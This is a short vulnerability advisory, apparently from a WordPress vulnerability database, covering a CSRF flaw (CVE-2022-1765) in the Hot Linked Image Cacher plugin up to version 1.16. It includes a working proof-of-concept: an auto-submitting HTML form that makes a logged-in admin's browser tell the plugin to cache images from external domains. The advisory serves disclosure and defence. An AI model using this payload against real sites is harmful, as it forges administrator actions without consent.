Lucene search
Daniel RufWPEX-ID:B50E7622-C1DC-485B-A5F5-B010B40EEF20HistoryMay 17, 2022 - 12:00 a.m.
Hot Linked Image Cacher <= 1.16 - Image upload/cache abuse via CSRF
2022-05-1700:00:00
Daniel Ruf
72
0.001 Low
EPSS
Percentile
43.4%
The plugin is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).
<form id="test" action="https://example.com/wp-admin/tools.php?page=hot-linked-image-cacher%2Fhotlinked-image-cacher.php" method="POST">
<input type="text" name="domains[]" value="example.com">
<input type="text" name="urlmethod" value="curl">
<input type="text" name="postid" value="enter a post id here">
<input type="text" name="step" value="3">
<input type="text" name="Submit" value="Cache These Images ยป">
</form>
<script>
document.getElementById("test").submit();
</script>Related
cve
cve
CVE-2022-1765
2022-06-13 13:15:12
cvelist
cvelist
nvd
nvd
CVE-2022-1765
2022-06-13 13:15:12
prion
prion
Cross site request forgery (csrf)
2022-06-13 13:15:00
cnvd
cnvd
patchstack
patchstack
wpvulndb
wpvulndb
Hot Linked Image Cacher <= 1.16 - Image upload/cache abuse via CSRF
2022-05-17 00:00:00